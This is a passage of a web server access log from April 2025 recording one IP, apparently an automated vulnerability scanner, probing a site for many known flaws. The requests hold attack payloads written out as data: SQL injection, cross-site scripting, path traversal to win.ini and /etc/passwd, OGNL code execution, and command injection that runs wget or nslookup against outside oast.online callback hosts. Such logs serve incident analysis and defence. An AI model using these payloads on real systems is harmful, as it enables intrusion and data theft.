-0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:08:08:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - - [24/Apr/2025:08:08:47 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:08:08:52 -0400] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:08:08:55 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:08:09:02 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" 154.84.62.234 - - [24/Apr/2025:08:09:15 -0400] "GET /wp-content/plugins/site-offline/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14" 154.84.62.234 - admin [24/Apr/2025:08:09:18 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:09:36 -0400] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Teak/4.3.1 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:09:50 -0400] "HEAD /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:10:06 -0400] "POST /wp-json/am-member/license HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:10:13 -0400] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:10:19 -0400] "GET /proxy?url=http%3a//0:8080/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:10:23 -0400] "GET /wp-content/uploads/html2wp/2w9rfS6dIPFtn6S4Y0Rc4bn8u4S.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:12:05 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 154.84.62.234 - - [24/Apr/2025:08:12:09 -0400] "POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:12:12 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 154.84.62.234 - - [24/Apr/2025:08:12:18 -0400] "GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:12:29 -0400] "GET /service/0/test.oast.me HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.16" 154.84.62.234 - - [24/Apr/2025:08:12:34 -0400] "GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:13:20 -0400] "GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:13:22 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:15:05 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:15:26 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:15:39 -0400] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:08:17:07 -0400] "POST /api/login HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:08:17:13 -0400] "GET /backend/backend/auth/signin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:11 -0400] "POST /functionRouter HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "GET /?class.module.classLoader.resources.context.configFile=https://d04qr7ij4pq19d75k490d79hw7x8ae5i4.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "GET /?class.module.classLoader.resources.context.configFile=http://d04qr7ij4pq19d75k4903b3zdwrrooi81.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/8.0.0 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "GET /sap/admin/public/default.html HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:29 -0400] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:31 -0400] "GET / HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:33 -0400] "GET / HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:35 -0400] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:43 -0400] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:18:46 -0400] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:19:20 -0400] "GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 154.84.62.234 - - [24/Apr/2025:08:19:25 -0400] "GET /?location=search HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:19:26 -0400] "GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:19:26 -0400] "POST /cms/content/list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" 154.84.62.234 - - [24/Apr/2025:08:19:32 -0400] "POST /admin/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:08:19:55 -0400] "GET /iupjournals/index.php/esj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:19:55 -0400] "POST /ca/rest/certrequests HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:02 -0400] "POST /apisix/batch-requests HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 HeyTapBrowser/45.11.0.1.1 Chrome/91.0.4472.88" 154.84.62.234 - - [24/Apr/2025:08:20:04 -0400] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:06 -0400] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:20:10 -0400] "GET /api/2w9rfRiATQu2Kk2ByU45IKzGlXg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:20:11 -0400] "GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:13 -0400] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:13 -0400] "POST /actuator/gateway/routes/2w9rfWhcJKnVkXvlNZDrEW7EpCk HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:20:15 -0400] "GET /vcac/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:20:20 -0400] "POST /actuator/gateway/refresh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:20:23 -0400] "GET /vcac/?original_uri=https://mgrokokbet.id%2Fvcac HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:20:23 -0400] "GET /modules/appagebuilder/config.xml HTTP/1.1" 200 119098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:20:27 -0400] "DELETE /actuator/gateway/routes/2w9rfWhcJKnVkXvlNZDrEW7EpCk HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:29 -0400] "POST /modules/appagebuilder/apajax.php?rand=8706356016209 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:08:20:36 -0400] "POST /api.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:37 -0400] "POST /modules/appagebuilder/apajax.php?rand=2465464578415 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:20:44 -0400] "POST /modules/appagebuilder/apajax.php?rand=7462234183742 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:08:23:46 -0400] "GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:23:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:24:38 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:08:25:14 -0400] "POST /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:25:33 -0400] "POST /servlet/GetProductVersion HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:25:48 -0400] "POST /geoserver/wms HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:08:26:01 -0400] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d04qr7ij4pq19d75k490hw3q34xigux8w.oast.online;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:26:03 -0400] "POST /cgi-bin/nightled.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:26:14 -0400] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d04qr7ij4pq19d75k490u6tke854jxr51.oast.online; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:08:26:50 -0400] "GET /bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:26:56 -0400] "GET /xwiki/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:27:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.26" 154.84.62.234 - - [24/Apr/2025:08:27:15 -0400] "GET /cgi-bin/downloadFlile.cgi?payload=`ls>../2w9rfVVWVrgdtVrelzJZACumkw0` HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:27:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.3.17" 154.84.62.234 - - [24/Apr/2025:08:27:20 -0400] "GET /2w9rfVVWVrgdtVrelzJZACumkw0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:27:44 -0400] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:08:27:49 -0400] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 154.84.62.234 - - [24/Apr/2025:08:28:40 -0400] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:28:48 -0400] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:28:58 -0400] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:08:29:03 -0400] "POST /alerts/alertLightbox.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:29:06 -0400] "POST /alerts/alertConfigField.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:08:30:21 -0400] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:30:21 -0400] "POST /dologin.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:30:41 -0400] "POST /admin/uploads.php?id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:30:49 -0400] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:30:54 -0400] "POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:08:30:55 -0400] "POST /js/filemanager/api/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:30:57 -0400] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d04qr7ij4pq19d75k490j1grmfxuwbxps.oast.online%22%29%7D/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:31:03 -0400] "GET /2w9rfTa76utUuEcAEXb7j8Gedgm.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" 154.84.62.234 - - [24/Apr/2025:08:31:03 -0400] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0" 154.84.62.234 - - [24/Apr/2025:08:31:16 -0400] "POST /OASREST/v2/authenticate HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:31:22 -0400] "GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" 154.84.62.234 - - [24/Apr/2025:08:32:01 -0400] "POST /api/content/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:32:09 -0400] "GET /2w9rfZ8Absp6XPLSHBAaQoVkBJT.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:33:47 -0400] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:34:25 -0400] "GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:34:27 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:35:37 -0400] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:35:47 -0400] "POST /api/agent/tabs/agentData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:08:36:30 -0400] "GET /navigate/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:37:11 -0400] "POST /ubus/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:37:11 -0400] "POST /admin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:08:37:19 -0400] "GET /admin/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:37:19 -0400] "POST /dfsms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:37:23 -0400] "POST /ccms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:37:25 -0400] "GET 